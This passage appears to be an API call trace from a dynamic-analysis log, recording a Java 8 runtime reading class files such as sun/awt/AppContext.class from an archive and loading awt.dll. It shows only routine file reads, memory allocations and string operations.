ReadFile (in: hFile=0x134, lpBuffer=0x12dac860, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c4e0, lpOverlapped=0x0 | out: lpBuffer=0x12dac860*, lpNumberOfBytesRead=0x208c4e0*=0xa0, lpOverlapped=0x0) returned 1 [0131.477] malloc (_Size=0x23) returned 0x12ddaf50 [0131.477] strlen (_Str="java/beans/ChangeListenerMap.class") returned 0x22 [0131.478] strcpy (in: _Dest=0x208c690, _Source="java/beans/ChangeListenerMap.class" | out: _Dest="java/beans/ChangeListenerMap.class") returned="java/beans/ChangeListenerMap.class" [0131.478] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f84cf6, lpNewFilePointer=0x208c110, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c110*=49827062) returned 1 [0131.478] ReadFile (in: hFile=0x134, lpBuffer=0x208c160, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c0e0, lpOverlapped=0x0 | out: lpBuffer=0x208c160*, lpNumberOfBytesRead=0x208c0e0*=0x1e, lpOverlapped=0x0) returned 1 [0131.479] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f84d36, lpNewFilePointer=0x208c170, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c170*=49827126) returned 1 [0131.479] ReadFile (in: hFile=0x134, lpBuffer=0x12e4b7b0, nNumberOfBytesToRead=0xc0a, lpNumberOfBytesRead=0x208c140, lpOverlapped=0x0 | out: lpBuffer=0x12e4b7b0*, lpNumberOfBytesRead=0x208c140*=0xc0a, lpOverlapped=0x0) returned 1 [0131.479] free (_Block=0x12e5f830) [0131.479] free (_Block=0x12e5f060) [0131.485] malloc (_Size=0x48) returned 0x12e5fe20 [0131.485] malloc (_Size=0xa0) returned 0x12dab940 [0131.485] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341045e, lpNewFilePointer=0x208c950, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c950*=54592606) returned 1 [0131.485] ReadFile (in: hFile=0x134, lpBuffer=0x12dab940, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c920, lpOverlapped=0x0 | out: lpBuffer=0x12dab940*, lpNumberOfBytesRead=0x208c920*=0xa0, lpOverlapped=0x0) returned 1 [0131.485] malloc (_Size=0x28) returned 0x12ddaf20 [0131.485] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f84bfe, lpNewFilePointer=0x208c550, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c550*=49826814) returned 1 [0131.485] ReadFile (in: hFile=0x134, lpBuffer=0x208c5a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c520, lpOverlapped=0x0 | out: lpBuffer=0x208c5a0*, lpNumberOfBytesRead=0x208c520*=0x1e, lpOverlapped=0x0) returned 1 [0131.485] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f84c43, lpNewFilePointer=0x208c5b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c5b0*=49826883) returned 1 [0131.485] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x208c580, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208c580*=0xb3, lpOverlapped=0x0) returned 1 [0131.486] malloc (_Size=0x48) returned 0x12e600a0 [0131.486] malloc (_Size=0xa0) returned 0x12daace0 [0131.486] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3410403, lpNewFilePointer=0x208d0d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d0d0*=54592515) returned 1 [0131.487] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d0a0, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208d0a0*=0xa0, lpOverlapped=0x0) returned 1 [0131.487] malloc (_Size=0x2e) returned 0x12ef4cd0 [0131.487] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f847b1, lpNewFilePointer=0x208ccd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccd0*=49825713) returned 1 [0131.491] ReadFile (in: hFile=0x134, lpBuffer=0x208cd20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cca0, lpOverlapped=0x0 | out: lpBuffer=0x208cd20*, lpNumberOfBytesRead=0x208cca0*=0x1e, lpOverlapped=0x0) returned 1 [0131.491] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f847fc, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=49825788) returned 1 [0131.491] ReadFile (in: hFile=0x134, lpBuffer=0x12e4b020, nNumberOfBytesToRead=0x402, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x12e4b020*, lpNumberOfBytesRead=0x208cd00*=0x402, lpOverlapped=0x0) returned 1 [0131.492] malloc (_Size=0x48) returned 0x12e600f0 [0131.492] malloc (_Size=0xa0) returned 0x12daace0 [0131.492] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34103b7, lpNewFilePointer=0x208c610, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c610*=54592439) returned 1 [0131.492] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c5e0, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208c5e0*=0xa0, lpOverlapped=0x0) returned 1 [0131.492] malloc (_Size=0x1f) returned 0x12dda9e0 [0131.492] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f846da, lpNewFilePointer=0x208c210, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c210*=49825498) returned 1 [0131.493] ReadFile (in: hFile=0x134, lpBuffer=0x208c260, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c1e0, lpOverlapped=0x0 | out: lpBuffer=0x208c260*, lpNumberOfBytesRead=0x208c1e0*=0x1e, lpOverlapped=0x0) returned 1 [0131.493] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f84716, lpNewFilePointer=0x208c270, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c270*=49825558) returned 1 [0131.493] ReadFile (in: hFile=0x134, lpBuffer=0x12e4b5c0, nNumberOfBytesToRead=0x9b, lpNumberOfBytesRead=0x208c240, lpOverlapped=0x0 | out: lpBuffer=0x12e4b5c0*, lpNumberOfBytesRead=0x208c240*=0x9b, lpOverlapped=0x0) returned 1 [0131.494] malloc (_Size=0x48) returned 0x12e5f880 [0131.494] malloc (_Size=0xa0) returned 0x12dabe10 [0131.494] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3410369, lpNewFilePointer=0x208ce80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce80*=54592361) returned 1 [0131.494] ReadFile (in: hFile=0x134, lpBuffer=0x12dabe10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ce50, lpOverlapped=0x0 | out: lpBuffer=0x12dabe10*, lpNumberOfBytesRead=0x208ce50*=0xa0, lpOverlapped=0x0) returned 1 [0131.494] malloc (_Size=0x21) returned 0x12ddadd0 [0131.494] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f838b9, lpNewFilePointer=0x208ca80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca80*=49821881) returned 1 [0131.495] ReadFile (in: hFile=0x134, lpBuffer=0x208cad0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ca50, lpOverlapped=0x0 | out: lpBuffer=0x208cad0*, lpNumberOfBytesRead=0x208ca50*=0x1e, lpOverlapped=0x0) returned 1 [0131.495] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f838f7, lpNewFilePointer=0x208cae0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cae0*=49821943) returned 1 [0131.495] ReadFile (in: hFile=0x134, lpBuffer=0x12e4b020, nNumberOfBytesToRead=0xde3, lpNumberOfBytesRead=0x208cab0, lpOverlapped=0x0 | out: lpBuffer=0x12e4b020*, lpNumberOfBytesRead=0x208cab0*=0xde3, lpOverlapped=0x0) returned 1 [0131.497] malloc (_Size=0x48) returned 0x12e5ee30 [0131.497] malloc (_Size=0xa0) returned 0x12dac390 [0131.497] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3410312, lpNewFilePointer=0x208c7e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c7e0*=54592274) returned 1 [0131.497] ReadFile (in: hFile=0x134, lpBuffer=0x12dac390, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c7b0, lpOverlapped=0x0 | out: lpBuffer=0x12dac390*, lpNumberOfBytesRead=0x208c7b0*=0xa0, lpOverlapped=0x0) returned 1 [0131.497] malloc (_Size=0x2a) returned 0x12ef4cd0 [0131.498] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f836af, lpNewFilePointer=0x208c3e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c3e0*=49821359) returned 1 [0131.498] ReadFile (in: hFile=0x134, lpBuffer=0x208c430, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c3b0, lpOverlapped=0x0 | out: lpBuffer=0x208c430*, lpNumberOfBytesRead=0x208c3b0*=0x1e, lpOverlapped=0x0) returned 1 [0131.498] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f836f6, lpNewFilePointer=0x208c440, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c440*=49821430) returned 1 [0131.498] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0x1c3, lpNumberOfBytesRead=0x208c410, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208c410*=0x1c3, lpOverlapped=0x0) returned 1 [0131.499] malloc (_Size=0x48) returned 0x12e5ffb0 [0131.499] malloc (_Size=0xa0) returned 0x12dac390 [0131.499] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34102b6, lpNewFilePointer=0x208d120, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d120*=54592182) returned 1 [0131.499] ReadFile (in: hFile=0x134, lpBuffer=0x12dac390, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d0f0, lpOverlapped=0x0 | out: lpBuffer=0x12dac390*, lpNumberOfBytesRead=0x208d0f0*=0xa0, lpOverlapped=0x0) returned 1 [0131.499] malloc (_Size=0x2f) returned 0x12ed5bb0 [0131.499] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f83519, lpNewFilePointer=0x208cd20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd20*=49820953) returned 1 [0131.499] ReadFile (in: hFile=0x134, lpBuffer=0x208cd70, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ccf0, lpOverlapped=0x0 | out: lpBuffer=0x208cd70*, lpNumberOfBytesRead=0x208ccf0*=0x1e, lpOverlapped=0x0) returned 1 [0131.499] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f83565, lpNewFilePointer=0x208cd80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd80*=49821029) returned 1 [0131.500] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0x14a, lpNumberOfBytesRead=0x208cd50, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208cd50*=0x14a, lpOverlapped=0x0) returned 1 [0131.500] malloc (_Size=0x48) returned 0x12e5f330 [0131.500] malloc (_Size=0xa0) returned 0x12dab260 [0131.500] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3410269, lpNewFilePointer=0x208c660, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c660*=54592105) returned 1 [0131.500] ReadFile (in: hFile=0x134, lpBuffer=0x12dab260, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c630, lpOverlapped=0x0 | out: lpBuffer=0x12dab260*, lpNumberOfBytesRead=0x208c630*=0xa0, lpOverlapped=0x0) returned 1 [0131.500] malloc (_Size=0x20) returned 0x12dda980 [0131.501] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f83477, lpNewFilePointer=0x208c260, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c260*=49820791) returned 1 [0131.501] ReadFile (in: hFile=0x134, lpBuffer=0x208c2b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c230, lpOverlapped=0x0 | out: lpBuffer=0x208c2b0*, lpNumberOfBytesRead=0x208c230*=0x1e, lpOverlapped=0x0) returned 1 [0131.501] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f834b4, lpNewFilePointer=0x208c2c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c2c0*=49820852) returned 1 [0131.501] ReadFile (in: hFile=0x134, lpBuffer=0x12e4b160, nNumberOfBytesToRead=0x65, lpNumberOfBytesRead=0x208c290, lpOverlapped=0x0 | out: lpBuffer=0x12e4b160*, lpNumberOfBytesRead=0x208c290*=0x65, lpOverlapped=0x0) returned 1 [0131.502] malloc (_Size=0x48) returned 0x12e5f010 [0131.502] malloc (_Size=0xa0) returned 0x12dabb50 [0131.502] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3410222, lpNewFilePointer=0x208ce70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce70*=54592034) returned 1 [0131.502] ReadFile (in: hFile=0x134, lpBuffer=0x12dabb50, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ce40, lpOverlapped=0x0 | out: lpBuffer=0x12dabb50*, lpNumberOfBytesRead=0x208ce40*=0xa0, lpOverlapped=0x0) returned 1 [0131.502] malloc (_Size=0x1a) returned 0x12dda9e0 [0131.502] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f8234b, lpNewFilePointer=0x208ca70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca70*=49816395) returned 1 [0131.502] ReadFile (in: hFile=0x134, lpBuffer=0x208cac0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ca40, lpOverlapped=0x0 | out: lpBuffer=0x208cac0*, lpNumberOfBytesRead=0x208ca40*=0x1e, lpOverlapped=0x0) returned 1 [0131.504] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f82382, lpNewFilePointer=0x208cad0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cad0*=49816450) returned 1 [0131.504] ReadFile (in: hFile=0x134, lpBuffer=0x12e4b020, nNumberOfBytesToRead=0x10f5, lpNumberOfBytesRead=0x208caa0, lpOverlapped=0x0 | out: lpBuffer=0x12e4b020*, lpNumberOfBytesRead=0x208caa0*=0x10f5, lpOverlapped=0x0) returned 1 [0131.508] malloc (_Size=0x48) returned 0x12e5f290 [0131.508] malloc (_Size=0xa0) returned 0x12dac650 [0131.508] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34101d9, lpNewFilePointer=0x208c7e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c7e0*=54591961) returned 1 [0131.508] ReadFile (in: hFile=0x134, lpBuffer=0x12dac650, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c7b0, lpOverlapped=0x0 | out: lpBuffer=0x12dac650*, lpNumberOfBytesRead=0x208c7b0*=0xa0, lpOverlapped=0x0) returned 1 [0131.508] malloc (_Size=0x1c) returned 0x12dda650 [0131.508] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f820ea, lpNewFilePointer=0x208c3e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c3e0*=49815786) returned 1 [0131.508] ReadFile (in: hFile=0x134, lpBuffer=0x208c430, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c3b0, lpOverlapped=0x0 | out: lpBuffer=0x208c430*, lpNumberOfBytesRead=0x208c3b0*=0x1e, lpOverlapped=0x0) returned 1 [0131.508] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f82123, lpNewFilePointer=0x208c440, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c440*=49815843) returned 1 [0131.508] ReadFile (in: hFile=0x134, lpBuffer=0x20fe980, nNumberOfBytesToRead=0x228, lpNumberOfBytesRead=0x208c410, lpOverlapped=0x0 | out: lpBuffer=0x20fe980*, lpNumberOfBytesRead=0x208c410*=0x228, lpOverlapped=0x0) returned 1 [0131.510] strlen (_Str="") returned 0x0 [0131.510] strlen (_Str=".dll") returned 0x4 [0131.510] strlen (_Str="") returned 0x0 [0131.510] strlen (_Str=".dll") returned 0x4 [0131.510] GetModuleHandleA (lpModuleName=0x0) returned 0x7ff7d5e70000 [0131.510] malloc (_Size=0x8) returned 0x1322f190 [0131.510] strlen (_Str="awt.dll") returned 0x7 [0131.510] malloc (_Size=0x8) returned 0x1322f210 [0131.510] strcpy (in: _Dest=0x1322f210, _Source="awt.dll" | out: _Dest="awt.dll") returned="awt.dll" [0131.511] free (_Block=0x1322f190) [0131.511] strlen (_Str="awt.dll") returned 0x7 [0131.511] strlen (_Str="awt") returned 0x3 [0131.511] strlen (_Str="_JNI_OnLoad@8") returned 0xd [0131.511] malloc (_Size=0x12) returned 0x12f4e920 [0131.511] strncpy (in: _Dest=0x12f4e920, _Source="_JNI_OnLoad@8", _Count=0xb | out: _Dest="_JNI_OnLoad") returned="_JNI_OnLoad" [0131.511] strcat (in: _Dest=0x12f4e920, _Source="_" | out: _Dest="_JNI_OnLoad_") returned="_JNI_OnLoad_" [0131.511] strcat (in: _Dest=0x12f4e920, _Source="awt" | out: _Dest="_JNI_OnLoad_awt") returned="_JNI_OnLoad_awt" [0131.511] strcat (in: _Dest=0x12f4e920, _Source="@8" | out: _Dest="_JNI_OnLoad_awt@8") returned="_JNI_OnLoad_awt@8" [0131.511] free (_Block=0x12f4e920) [0131.511] strlen (_Str="awt") returned 0x3 [0131.511] strlen (_Str="JNI_OnLoad") returned 0xa [0131.511] malloc (_Size=0xf) returned 0x12f4eca0 [0131.511] strcpy (in: _Dest=0x12f4eca0, _Source="JNI_OnLoad" | out: _Dest="JNI_OnLoad") returned="JNI_OnLoad" [0131.511] strcat (in: _Dest=0x12f4eca0, _Source="_" | out: _Dest="JNI_OnLoad_") returned="JNI_OnLoad_" [0131.511] strcat (in: _Dest=0x12f4eca0, _Source="awt" | out: _Dest="JNI_OnLoad_awt") returned="JNI_OnLoad_awt" [0131.511] free (_Block=0x12f4eca0) [0131.511] free (_Block=0x1322f210) [0131.512] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll") returned 0x2e [0131.512] malloc (_Size=0x68) returned 0x12ec41f0 [0131.512] wcscpy (in: _Dest=0x12ec41f0, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll") returned="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll" [0131.512] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll", nBufferLength=0x9, lpBuffer=0x208bcc8, lpFilePart=0x208bcc0 | out: lpBuffer="", lpFilePart=0x208bcc0*=0x0) returned 0x2f [0131.512] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_171\\bin\\awt.dll"), fInfoLevelId=0x0, lpFileInformation=0x208ba60 | out: lpFileInformation=0x208ba60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb165611, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb165611, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb165611, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x1725c8)) returned 1 [0131.513] free (_Block=0x12ec41f0) [0131.548] strlen (_Str="sun/misc/ThreadGroupUtils.class") returned 0x1f [0131.548] malloc (_Size=0x48) returned 0x12e5fc90 [0131.548] malloc (_Size=0xa0) returned 0x12dabf70 [0131.548] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341018c, lpNewFilePointer=0x208b8d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8d0*=54591884) returned 1 [0131.548] ReadFile (in: hFile=0x134, lpBuffer=0x12dabf70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b8a0, lpOverlapped=0x0 | out: lpBuffer=0x12dabf70*, lpNumberOfBytesRead=0x208b8a0*=0xa0, lpOverlapped=0x0) returned 1 [0131.548] malloc (_Size=0x20) returned 0x12ddaf50 [0131.549] strlen (_Str="sun/misc/ThreadGroupUtils.class") returned 0x1f [0131.549] strcpy (in: _Dest=0x208ba50, _Source="sun/misc/ThreadGroupUtils.class" | out: _Dest="sun/misc/ThreadGroupUtils.class") returned="sun/misc/ThreadGroupUtils.class" [0131.549] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f81f05, lpNewFilePointer=0x208b4d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4d0*=49815301) returned 1 [0131.549] ReadFile (in: hFile=0x134, lpBuffer=0x208b520, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b4a0, lpOverlapped=0x0 | out: lpBuffer=0x208b520*, lpNumberOfBytesRead=0x208b4a0*=0x1e, lpOverlapped=0x0) returned 1 [0131.581] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f81f42, lpNewFilePointer=0x208b530, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b530*=49815362) returned 1 [0131.581] ReadFile (in: hFile=0x134, lpBuffer=0x20fe980, nNumberOfBytesToRead=0x1a8, lpNumberOfBytesRead=0x208b500, lpOverlapped=0x0 | out: lpBuffer=0x20fe980*, lpNumberOfBytesRead=0x208b500*=0x1a8, lpOverlapped=0x0) returned 1 [0131.582] free (_Block=0x12dda650) [0131.582] free (_Block=0x12e5f290) [0131.593] strlen (_Str="sun/awt/AWTAutoShutdown.class") returned 0x1d [0131.593] malloc (_Size=0x48) returned 0x12e5f830 [0131.594] malloc (_Size=0xa0) returned 0x12daace0 [0131.594] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3410141, lpNewFilePointer=0x208ce80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce80*=54591809) returned 1 [0131.594] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ce50, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208ce50*=0xa0, lpOverlapped=0x0) returned 1 [0131.594] malloc (_Size=0x1e) returned 0x12ddabf0 [0131.594] strlen (_Str="sun/awt/AWTAutoShutdown.class") returned 0x1d [0131.594] strcpy (in: _Dest=0x208d000, _Source="sun/awt/AWTAutoShutdown.class" | out: _Dest="sun/awt/AWTAutoShutdown.class") returned="sun/awt/AWTAutoShutdown.class" [0131.594] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f807cc, lpNewFilePointer=0x208ca80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca80*=49809356) returned 1 [0131.595] ReadFile (in: hFile=0x134, lpBuffer=0x208cad0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ca50, lpOverlapped=0x0 | out: lpBuffer=0x208cad0*, lpNumberOfBytesRead=0x208ca50*=0x1e, lpOverlapped=0x0) returned 1 [0131.595] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f80807, lpNewFilePointer=0x208cae0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cae0*=49809415) returned 1 [0131.595] ReadFile (in: hFile=0x134, lpBuffer=0x12e4b020, nNumberOfBytesToRead=0x16fe, lpNumberOfBytesRead=0x208cab0, lpOverlapped=0x0 | out: lpBuffer=0x12e4b020*, lpNumberOfBytesRead=0x208cab0*=0x16fe, lpOverlapped=0x0) returned 1 [0131.595] free (_Block=0x12ddaf50) [0131.596] free (_Block=0x12e5fc90) [0131.856] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x37c [0131.857] CloseHandle (hObject=0x37c) returned 1 [0135.047] strlen (_Str="sun/awt/AppContext.class") returned 0x18 [0135.047] malloc (_Size=0x48) returned 0x12e5f560 [0135.047] malloc (_Size=0xa0) returned 0x12daaef0 [0135.047] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341358f, lpNewFilePointer=0x208e490, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e490*=54605199) returned 1 [0135.047] ReadFile (in: hFile=0x134, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e460, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208e460*=0xa0, lpOverlapped=0x0) returned 1 [0135.048] malloc (_Size=0x19) returned 0x12ddae90 [0135.048] strlen (_Str="sun/awt/AppContext.class") returned 0x18 [0135.048] strcpy (in: _Dest=0x208e610, _Source="sun/awt/AppContext.class" | out: _Dest="sun/awt/AppContext.class") returned="sun/awt/AppContext.class" [0135.048] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2ff5665, lpNewFilePointer=0x208e090, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e090*=50288229) returned 1 [0135.048] ReadFile (in: hFile=0x134, lpBuffer=0x208e0e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e060, lpOverlapped=0x0 | out: lpBuffer=0x208e0e0*, lpNumberOfBytesRead=0x208e060*=0x1e, lpOverlapped=0x0) returned 1 [0135.049] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2ff569b, lpNewFilePointer=0x208e0f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e0f0*=50288283) returned 1 [0135.049] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0x25e5, lpNumberOfBytesRead=0x208e0c0, lpOverlapped=0x0 | out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x208e0c0*=0x25e5, lpOverlapped=0x0) returned 1 [0135.063] free (_Block=0x12dda980) [0135.063] free (_Block=0x12e5ff60) [0135.081] strlen (_Str="sun/awt/AppContext$GetAppContextLock.class") returned 0x2a [0135.082] malloc (_Size=0x48) returned 0x12e5ee80 [0135.082] malloc (_Size=0xa0) returned 0x12dab520 [0135.082] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3413491, lpNewFilePointer=0x208de10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208de10*=54604945) returned 1 [0135.082] ReadFile (in: hFile=0x134, lpBuffer=0x12dab520, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dde0, lpOverlapped=0x0 | out: lpBuffer=0x12dab520*, lpNumberOfBytesRead=0x208dde0*=0xa0, lpOverlapped=0x0) returned 1 [0135.082] malloc (_Size=0x2b) returned 0x12d60c00 [0135.082] strlen (_Str="sun/awt/AppContext$GetAppContextLock.class") returned 0x2a [0135.083] strcpy (in: _Dest=0x208df90, _Source="sun/awt/AppContext$GetAppContextLock.class" | out: _Dest="sun/awt/AppContext$GetAppContextLock.class") returned="sun/awt/AppContext$GetAppContextLock.class" [0135.083] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2ff1b24, lpNewFilePointer=0x208da10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208da10*=50273060) returned 1 [0135.083] ReadFile (in: hFile=0x134, lpBuffer=0x208da60, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d9e0, lpOverlapped=0x0 | out: lpBuffer=0x208da60*, lpNumberOfBytesRead=0x208d9e0*=0x1e, lpOverlapped=0x0) returned 1 [0135.083] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2ff1b6c, lpNewFilePointer=0x208da70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208da70*=50273132) returned 1 [0135.083] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0x144, lpNumberOfBytesRead=0x208da40, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208da40*=0x144, lpOverlapped=0x0) returned 1 [0135.084] free (_Block=0x12ddae90) [0135.084] free (_Block=0x12e5f560) [0135.090] strlen (_Str="sun/awt/AppContext$6.class") returned 0x1a [0135.090] malloc (_Size=0x48) returned 0x12e5f150 [0135.090] malloc (_Size=0xa0) returned 0x12dac390 [0135.090] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3413449, lpNewFilePointer=0x208de10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208de10*=54604873) returned 1 [0135.090] ReadFile (in: hFile=0x134, lpBuffer=0x12dac390, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dde0, lpOverlapped=0x0 | out: lpBuffer=0x12dac390*, lpNumberOfBytesRead=0x208dde0*=0xa0, lpOverlapped=0x0) returned 1 [0135.090] malloc (_Size=0x1b) returned 0x12dda980 [0135.091] strlen (_Str="sun/awt/AppContext$6.class") returned 0x1a [0135.092] strcpy (in: _Dest=0x208df90, _Source="sun/awt/AppContext$6.class" | out: _Dest="sun/awt/AppContext$6.class") returned="sun/awt/AppContext$6.class" [0135.092] SetFilePointerEx (in: 